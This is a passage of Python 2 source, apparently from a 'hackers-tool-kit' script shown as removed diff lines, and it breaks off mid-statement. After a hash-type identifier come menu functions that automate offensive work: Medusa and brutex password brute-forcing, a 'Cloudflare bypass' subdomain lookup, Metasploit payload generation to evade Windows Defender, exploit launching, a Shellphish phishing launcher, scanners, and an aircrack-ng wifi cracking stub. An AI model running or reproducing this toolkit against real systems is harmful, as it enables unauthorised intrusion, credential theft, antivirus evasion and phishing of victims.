hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106300") - def md5saltpassusername(): - hs='9ae20f88189f6e3a62711608ddb6f5fd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106320") - def md5saltmd5pass(): - hs='aca2a052962b2564027ee62933d2382f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106340") - def md5saltmd5passsalt(): - hs='de0237dc03a8efdf6552fbe7788b2fdd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106360") - def md5saltmd5passsalt(): - hs='5b8b12ca69d3e7b2a3e2308e7bef3e6f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106380") - def md5saltmd5saltpass(): - hs='d8f3b3f004d387086aae24326b575b23' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106400") - def md5saltmd5md5passsalt(): - hs='81f181454e23319779b03d74d062b1a2' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106420") - def md5username0pass(): - hs='e44a60f8f2106492ae16581c91edb3ba' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106440") - def md5usernameLFpass(): - hs='654741780db415732eaee12b1b909119' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106460") - def md5usernamemd5passsalt(): - hs='954ac5505fd1843bbb97d1b2cda0b98f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106480") - def md5md5pass(): - hs='a96103d267d024583d5565436e52dfb3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106500") - def md5md5passsalt(): - hs='5848c73c2482d3c2c7b6af134ed8dd89' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106520") - def md5md5passmd5salt(): - hs='8dc71ef37197b2edba02d48c30217b32' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106540") - def md5md5saltpass(): - hs='9032fabd905e273b9ceb1e124631bd67' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106560") - def md5md5saltmd5pass(): - hs='8966f37dbb4aca377a71a9d3d09cd1ac' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106580") - def md5md5usernamepasssalt(): - hs='4319a3befce729b34c3105dbc29d0c40' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106600") - def md5md5md5pass(): - hs='ea086739755920e732d0f4d8c1b6ad8d' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106620") - def md5md5md5md5pass(): - hs='02528c1f2ed8ac7d83fe76f3cf1c133f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106640") - def md5md5md5md5md5pass(): - hs='4548d2c062933dff53928fd4ae427fc0' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106660") - def md5sha1pass(): - hs='cb4ebaaedfd536d965c452d9569a6b1e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106680") - def md5sha1md5pass(): - hs='099b8a59795e07c334a696a10c0ebce0' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106700") - def md5sha1md5sha1pass(): - hs='06e4af76833da7cc138d90602ef80070' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106720") - def md5strtouppermd5pass(): - hs='519de146f1a658ab5e5e2aa9b7d2eec8' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106740") - - def LineageIIC4(): - hs='0x49a57f66bd3d5ba6abda5579c264a0e4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True and hash[0:2].find('0x')==0: - jerar.append("107080") - def MD5phpBB3(): - hs='$H$9kyOtE8CDqMJ44yfn9PFz2E.L2oVzL1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$H$')==0: - jerar.append("107040") - def MD5Unix(): - hs='$1$cTuJH0Ju$1J8rI.mJReeMvpKUZbSlY/' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$1$')==0: - jerar.append("107060") - def MD5Wordpress(): - hs='$P$BiTOhOj3ukMgCci2juN0HRbCdDRqeh.' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$P$')==0: - jerar.append("107020") - - def MD5APR(): - hs='$apr1$qAUKoKlG$3LuCncByN76eLxZAh/Ldr1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash[0:4].find('$apr')==0: - jerar.append("108020") - - def Haval160(): - hs='a106e921284dd69dad06192a4411ec32fce83dbb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109100") - def Haval160HMAC(): - hs='29206f83edc1d6c3f680ff11276ec20642881243' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109200") - def MySQL5(): - hs='9bb2fb57063821c762cc009f7584ddae9da431ff' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109040") - def MySQL160bit(): - hs='*2470c0c06dee42fd1618bb99005adca2ec9d1e19' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:1].find('*')==0: - jerar.append("109060") - def RipeMD160(): - hs='dc65552812c66997ea7320ddfb51f5625d74721b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109120") - def RipeMD160HMAC(): - hs='ca28af47653b4f21e96c1235984cb50229331359' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109180") - def SHA1(): - hs='4a1d4dbc1e193ec3ab2e9213876ceb8f4db72333' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109020") - def SHA1HMAC(): - hs='6f5daac3fee96ba1382a09b1ba326ca73dccf9e7' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109140") - def SHA1MaNGOS(): - hs='a2c0cdb6d1ebd1b9f85c6e25e0f8732e88f02f96' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109220") - def SHA1MaNGOS2(): - hs='644a29679136e09d0bd99dfd9e8c5be84108b5fd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109240") - def Tiger160(): - hs='c086184486ec6388ff81ec9f235287270429b225' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109080") - def Tiger160HMAC(): - hs='6603161719da5e56e1866e4f61f79496334e6a10' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109160") - def sha1passsalt(): - hs='f006a1863663c21c541c8d600355abfeeaadb5e4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109260") - def sha1saltpass(): - hs='299c3d65a0dcab1fc38421783d64d0ecf4113448' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109280") - def sha1saltmd5pass(): - hs='860465ede0625deebb4fbbedcb0db9dc65faec30' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109300") - def sha1saltmd5passsalt(): - hs='6716d047c98c25a9c2cc54ee6134c73e6315a0ff' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109320") - def sha1saltsha1pass(): - hs='58714327f9407097c64032a2fd5bff3a260cb85f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109340") - def sha1saltsha1saltsha1pass(): - hs='cc600a2903130c945aa178396910135cc7f93c63' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109360") - def sha1usernamepass(): - hs='3de3d8093bf04b8eb5f595bc2da3f37358522c9f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109380") - def sha1usernamepasssalt(): - hs='00025111b3c4d0ac1635558ce2393f77e94770c5' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109400") - def sha1md5pass(): - hs='fa960056c0dea57de94776d3759fb555a15cae87' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("1094202") - def sha1md5passsalt(): - hs='1dad2b71432d83312e61d25aeb627593295bcc9a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109440") - def sha1md5sha1pass(): - hs='8bceaeed74c17571c15cdb9494e992db3c263695' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109460") - def sha1sha1pass(): - hs='3109b810188fcde0900f9907d2ebcaa10277d10e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109480") - def sha1sha1passsalt(): - hs='780d43fa11693b61875321b6b54905ee488d7760' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109500") - def sha1sha1passsubstrpass03(): - hs='5ed6bc680b59c580db4a38df307bd4621759324e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109520") - def sha1sha1saltpass(): - hs='70506bac605485b4143ca114cbd4a3580d76a413' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109540") - def sha1sha1sha1pass(): - hs='3328ee2a3b4bf41805bd6aab8e894a992fa91549' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109560") - def sha1strtolowerusernamepass(): - hs='79f575543061e158c2da3799f999eb7c95261f07' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109580") - - def Haval192(): - hs='cd3a90a3bebd3fa6b6797eba5dab8441f16a7dfa96c6e641' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110040") - def Haval192HMAC(): - hs='39b4d8ecf70534e2fd86bb04a877d01dbf9387e640366029' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110080") - def Tiger192(): - hs='c086184486ec6388ff81ec9f235287270429b2253b248a70' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110020") - def Tiger192HMAC(): - hs='8e914bb64353d4d29ab680e693272d0bd38023afa3943a41' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110060") - - def MD5passsaltjoomla1(): - hs='35d1c0d69a2df62be2df13b087343dc9:BeKMviAfcXeTPTlX' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: - jerar.append("112020") - - def SHA1Django(): - hs='sha1$Zion3R$299c3d65a0dcab1fc38421783d64d0ecf4113448' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:5].find('sha1$')==0: - jerar.append("113020") - - def Haval224(): - hs='f65d3c0ef6c56f4c74ea884815414c24dbf0195635b550f47eac651a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114040") - def Haval224HMAC(): - hs='f10de2518a9f7aed5cf09b455112114d18487f0c894e349c3c76a681' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114080") - def SHA224(): - hs='e301f414993d5ec2bd1d780688d37fe41512f8b57f6923d054ef8e59' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114020") - def SHA224HMAC(): - hs='c15ff86a859892b5e95cdfd50af17d05268824a6c9caaa54e4bf1514' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114060") - - def SHA256(): - hs='2c740d20dab7f14ec30510a11f8fd78b82bc3a711abe8a993acdb323e78e6d5e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115020") - def SHA256HMAC(): - hs='d3dd251b7668b8b6c12e639c681e88f2c9b81105ef41caccb25fcde7673a1132' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115120") - def Haval256(): - hs='7169ecae19a5cd729f6e9574228b8b3c91699175324e6222dec569d4281d4a4a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115040") - def Haval256HMAC(): - hs='6aa856a2cfd349fb4ee781749d2d92a1ba2d38866e337a4a1db907654d4d4d7a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115140") - def GOSTR341194(): - hs='ab709d384cce5fda0793becd3da0cb6a926c86a8f3460efb471adddee1c63793' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115060") - def RipeMD256(): - hs='5fcbe06df20ce8ee16e92542e591bdea706fbdc2442aecbf42c223f4461a12af' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115080") - def RipeMD256HMAC(): - hs='43227322be1b8d743e004c628e0042184f1288f27c13155412f08beeee0e54bf' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115160") - def SNEFRU256(): - hs='3a654de48e8d6b669258b2d33fe6fb179356083eed6ff67e27c5ebfa4d9732bb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115100") - def SNEFRU256HMAC(): - hs='4e9418436e301a488f675c9508a2d518d8f8f99e966136f2dd7e308b194d74f9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115180") - def SHA256md5pass(): - hs='b419557099cfa18a86d1d693e2b3b3e979e7a5aba361d9c4ec585a1a70c7bde4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115200") - def SHA256sha1pass(): - hs='afbed6e0c79338dbfe0000efe6b8e74e3b7121fe73c383ae22f5b505cb39c886' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115220") - - def MD5passsaltjoomla2(): - hs='fb33e01e4f8787dc8beb93dac4107209:fxJUXVjYRafVauT77Cze8XwFrWaeAYB2' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: - jerar.append("116020") - def SAM(): - hs='4318B176C3D8E3DEAAD3B435B51404EE:B7C899154197E8A2A33121D76A240AB5' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash.islower()==False and hash[32:33].find(':')==0: - jerar.append("116040") - - def SHA256Django(): - hs='sha256$Zion3R$9e1a08aa28a22dfff722fad7517bae68a55444bb5e2f909d340767cec9acf2c3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha256')==0: - jerar.append("117020") - - def RipeMD320(): - hs='b4f7c8993a389eac4f421b9b3b2bfb3a241d05949324a8dab1286069a18de69aaf5ecc3c2009d8ef' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("118020") - def RipeMD320HMAC(): - hs='244516688f8ad7dd625836c0d0bfc3a888854f7c0161f01de81351f61e98807dcd55b39ffe5d7a78' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("118040") - - def SHA384(): - hs='3b21c44f8d830fa55ee9328a7713c6aad548fe6d7a4a438723a0da67c48c485220081a2fbc3e8c17fd9bd65f8d4b4e6b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("119020") - def SHA384HMAC(): - hs='bef0dd791e814d28b4115eb6924a10beb53da47d463171fe8e63f68207521a4171219bb91d0580bca37b0f96fddeeb8b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("119040") - - def SHA256s(): - hs='$6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$6$')==0: - jerar.append("120020") - - def SHA384Django(): - hs='sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha384')==0: - print " [+] SHA-384(Django)" - jerar.append("121020") - - def SHA512(): - hs='ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122020") - def SHA512HMAC(): - hs='dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122060") - def Whirlpool(): - hs='76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122040") - def WhirlpoolHMAC(): - hs='77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122080") - - - print logo - while True: - jerar=[] - print """ - -------------------------------------------------------------------------""" - hash = raw_input(" HASH: ") - ADLER32(); CRC16(); CRC16CCITT(); CRC32(); CRC32B(); DESUnix(); DomainCachedCredentials(); FCS16(); GHash323(); GHash325(); GOSTR341194(); Haval128(); Haval128HMAC(); Haval160(); Haval160HMAC(); Haval192(); Haval192HMAC(); Haval224(); Haval224HMAC(); Haval256(); Haval256HMAC(); LineageIIC4(); MD2(); MD2HMAC(); MD4(); MD4HMAC(); MD5(); MD5APR(); MD5HMAC(); MD5HMACWordpress(); MD5phpBB3(); MD5Unix(); MD5Wordpress(); MD5Half(); MD5Middle(); MD5passsaltjoomla1(); MD5passsaltjoomla2(); MySQL(); MySQL5(); MySQL160bit(); NTLM(); RAdminv2x(); RipeMD128(); RipeMD128HMAC(); RipeMD160(); RipeMD160HMAC(); RipeMD256(); RipeMD256HMAC(); RipeMD320(); RipeMD320HMAC(); SAM(); SHA1(); SHA1Django(); SHA1HMAC(); SHA1MaNGOS(); SHA1MaNGOS2(); SHA224(); SHA224HMAC(); SHA256(); SHA256s(); SHA256Django(); SHA256HMAC(); SHA256md5pass(); SHA256sha1pass(); SHA384(); SHA384Django(); SHA384HMAC(); SHA512(); SHA512HMAC(); SNEFRU128(); SNEFRU128HMAC(); SNEFRU256(); SNEFRU256HMAC(); Tiger128(); Tiger128HMAC(); Tiger160(); Tiger160HMAC(); Tiger192(); Tiger192HMAC(); Whirlpool(); WhirlpoolHMAC(); XOR32(); md5passsalt(); md5saltmd5pass(); md5saltpass(); md5saltpasssalt(); md5saltpassusername(); md5saltmd5pass(); md5saltmd5passsalt(); md5saltmd5passsalt(); md5saltmd5saltpass(); md5saltmd5md5passsalt(); md5username0pass(); md5usernameLFpass(); md5usernamemd5passsalt(); md5md5pass(); md5md5passsalt(); md5md5passmd5salt(); md5md5saltpass(); md5md5saltmd5pass(); md5md5usernamepasssalt(); md5md5md5pass(); md5md5md5md5pass(); md5md5md5md5md5pass(); md5sha1pass(); md5sha1md5pass(); md5sha1md5sha1pass(); md5strtouppermd5pass(); sha1passsalt(); sha1saltpass(); sha1saltmd5pass(); sha1saltmd5passsalt(); sha1saltsha1pass(); sha1saltsha1saltsha1pass(); sha1usernamepass(); sha1usernamepasssalt(); sha1md5pass(); sha1md5passsalt(); sha1md5sha1pass(); sha1sha1pass(); sha1sha1passsalt(); sha1sha1passsubstrpass03(); sha1sha1saltpass(); sha1sha1sha1pass(); sha1strtolowerusernamepass() - - if len(jerar)==0: - print "" - print " Not Found." - elif len(jerar)>2: - jerar.sort() - print "" - print "Possible Hashs:" - print "[+] ",algorithms[jerar[0]] - print "[+] ",algorithms[jerar[1]] - print "" - print "Least Possible Hashs:" - for a in range(int(len(jerar))-2): - print "[+] ",algorithms[jerar[a+2]] - else: - jerar.sort() - print "" - print "Possible Hashs:" - for a in range(len(jerar)): - print "[+] ",algorithms[jerar[a]] -#------------------# -#FIND HASH TYPE END# - - -#RESTART SCRIPT START# -#--------------------# -def restart(): - os.system("clear") - os.system("cd /root/hackers-tool-kit && python htk.py") -#------------------# -#RESTART SCRIPT END# - - -#MEDUSA AUTOMATED START# -#----------------------# -def medusa(): - k = raw_input("Target Host: ") - u = raw_input("User: ") - p = raw_input("Wordlist: ") - os.system("cat /root/hackers-tool-kit/tools/medusamods.txt") - print "\n" - m = raw_input("Module: ") - n = raw_input("Port: ") - a = 'medusa -h {0} -u {1} -P {2} -M {3} -n {4}'.format(k,u,p,m,n) - os.system(a) -#--------------------# -#MEDUSA AUTOMATED END# - - -#WAF DETECTER START# -#------------------# -def wafwoof(): - j = raw_input("Enter Target: ") - k = 'wafw00f {0}'.format(j) - os.system(k) -#----------------# -#WAF DETECTER END# - - -#CLOUDFLARE BYPASS START# -#-----------------------# -def cloud(): - - subdomainlist = ["ftp", "cpanel", "webmail" , "mail" , "www", "www1", "www2", "www3", "www4", "www5","ns1", "ns2" , "forums" , "blog"] - - print ('\033[1m' + "CLOUDFLARE BYPASS SCRIPT ") - - host = raw_input("Enter Target: ") - for sublist in subdomainlist: - try: - hosts = str(sublist) + "." + str(host) - showip = socket.gethostbyname(str(hosts)) - print " Cloudflare has begun to be bypassed "+str(showip)+' :| '+str(hosts) - except: - pass - - print ( '\033[93m' + "Credit Goes To: tugrulbey.com") - print ( '\033[92m' + "Credit Goes To: tztugrulbey@protonmail.com") -#---------------------# -#CLOUDFLARE BYPASS END# - - -#BRUTEFORCE ALL SERVICES ON WEB START# -#------------------------------------# -def brutex(): - k = raw_input("Target: ") - p = raw_input("Port: ") - a = 'brutex {0} {1}'.format(k,p) - os.system(a) -#----------------------------------# -#BRUTEFORCE ALL SERVICES ON WEB END# - - -#METERPRETER HELP MENU START# -#---------------------------# -def methelp(): - os.system("cat /root/hackers-tool-kit/tools/meterpreter.txt") -#-------------------------# -#METERPRETER HELP MENU END# - - -#WINDOWS DEFENDER BYPASS START# -#-----------------------------# -def winbyp(): - os.system("cat /root/hackers-tool-kit/tools/payloads.txt") - pay = raw_input("Payload: ") - port = raw_input("Port: ") - name = raw_input("File Name: ") - os.system('echo "use evasion/windows/windows_defender_exe\n" > winbyp.rc') - os.system('echo "set payload {0}\n" >> winbyp.rc'.format(pay)) - os.system('echo "set LHOST 127.0.0.1\n" >> winbyp.rc') - os.system('echo "set LPORT {0}\n" >> winbyp.rc'.format(port)) - os.system('echo "set filename {0}.exe\n" >> winbyp.rc'.format(name)) - os.system('echo "run\n" >> winbyp.rc') - os.system("service postgresql restart") - os.system('msfconsole -r winbyp.rc') - os.system('rm -rf winbyp.rc') -#---------------------------# -#WINDOWS DEFENDER BYPASS END# - - -#USE A EXPLOIT START# -#-------------------# -def exploit(): - os.system("cat /root/hackers-tool-kit/tools/exploits.txt") - print "\n" - f = raw_input("Select Exploit: ") - os.system('echo "use {0}\n" >> exploit.rc'.format(f)) - os.system('echo "show options\n" >> exploit.rc'.format(f)) - os.system("service postgresql restart") - os.system('msfconsole -r exploit.rc') - os.system('rm -rf exploit.rc') -#-----------------# -#USE A EXPLOIT END# - - -#PHISHING AUTOMATED START# -#------------------------# -def phish(): - os.system("bash /root/shellphish/shellphish.sh") -#----------------------# -#PHISHING AUTOMATED END# - - -#LIST DATABASE INFO START# -#------------------------# -def datalist(): - os.system('echo "hosts\n" >> data.rc') - os.system('echo "services\n" >> data.rc') - os.system("service postgresql restart") - os.system('msfconsole -r data.rc') - os.system('rm -rf data.rc') -#----------------------# -#LIST DATABASE INFO END# - - -#ALL METASPLOIT EVASIONS START# -#-----------------------------# -def msfev(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show evasion'""") -#---------------------------# -#ALL METASPLOIT EVASIONS END# - - -#FULLY UPDATE YOUR OS START# -#--------------------------# -def upgrade(): - os.system("apt update && apt upgrade") -#------------------------# -#FULLY UPDATE YOUR OS END# - - -#USE A NMAP SCRIPT START# -#-----------------------# -def nscript(): - os.system("cat /root/hackers-tool-kit/tools/scripts.txt") - print "\n" - j = raw_input(G+"Select Script:\033[0m ") - k = raw_input(G+"Target:\033[0m ") - a = 'nmap --script {0} {1}'.format(j,k) - os.system(a) -#---------------------# -#USE A NMAP SCRIPT END# - - -#GET HOST SSH VERSION START# -#--------------------------# -def sshver(): - f = raw_input(G+"Target: \033[0m") - g = raw_input(G+"Port: \033[0m") - t = raw_input(G+"Threads: \033[0m") - b = raw_input(G+"Timeout: \033[0m") - os.system('echo "use auxiliary/scanner/ssh/ssh_version\n" >> sshver.rc') - os.system('echo "set RHOSTS {0}\n" >> sshver.rc'.format(f)) - os.system('echo "set RPORT {0}\n" >> sshver.rc'.format(g)) - os.system('echo "set THREADS {0}\n" >> sshver.rc'.format(t)) - os.system('echo "set TIMEOUT {0}\n" >> sshver.rc'.format(b)) - os.system('echo "show options\n" >> sshver.rc') - os.system('echo "run\n" >> sshver.rc') - os.system("service postgresql restart") - os.system('msfconsole -r sshver.rc') - os.system('rm -rf sshver.rc') -#------------------------# -#GET HOST SSH VERSION END# - - -#USE PROXYCHAINS FOR WEB START# -#-----------------------------# -def chains(): - h = raw_input("Enter Browser: ") - j = raw_input("Enter Website: ") - a = 'proxychains {0} {1}'.format(h,j) - os.system(a) -#---------------------------# -#USE PROXYCHAINS FOR WEB END# - - -#GET HOST MYSQL VERSION START# -#----------------------------# -def mysqlv(): - f = raw_input(G+"Target: \033[0m") - g = raw_input(G+"Port: \033[0m") - t = raw_input(G+"Threads: \033[0m") - os.system('echo "use auxiliary/scanner/mysql/mysql_version\n" >> mysqlv.rc') - os.system('echo "set RHOSTS {0}\n" >> mysqlv.rc'.format(f)) - os.system('echo "set RPORT {0}\n" >> mysqlv.rc'.format(g)) - os.system('echo "set THREADS {0}\n" >> mysqlv.rc'.format(t)) - os.system('echo "show options\n" >> mysqlv.rc') - os.system('echo "run\n" >> mysqlv.rc') - os.system("service postgresql restart") - os.system('msfconsole -r mysqlv.rc') - os.system('rm -rf mysqlv.rc') -#--------------------------# -#GET HOST MYSQL VERSION END# - - -#CONNECT TO A HOST START# -#-----------------------# -def connect(): - h = raw_input("Enter Host: ") - print "\n" - print " How would you like to connect?" - print "---------------------------------------" - print "ssh: Secure Shell | Default Port = 22" - print "---------------------------------------" - print "telnet: Network Virtual Terminal | Default Port = 23" - print "---------------------------------------" - j = raw_input("Select Protocol: ") - a = '{0} {1}'.format(j,h) - os.system(a) -#---------------------# -#CONNECT TO A HOST END# - - - -#OPEN NEW TERMINAL START# -#-----------------------# -def terminal(): - os.system("gnome-terminal") -#---------------------# -#OPEN NEW TERMINAL END# - - -#AIRCRACK-NG [WIFI HACK] AUTOMATED START# -#---------------------------------------# -def aircrack(): - b = raw_input(G+"BSSID: \033[0m") - e = raw_input(G+"ESSID: \033[0m") - w = raw_input(G+"Wordlist: \033[0m") - h = raw_input(G+"Handshake file: \033[0m") - os.system("iwconfig") - i = raw_input(G+"Interface: \033[0m") - a 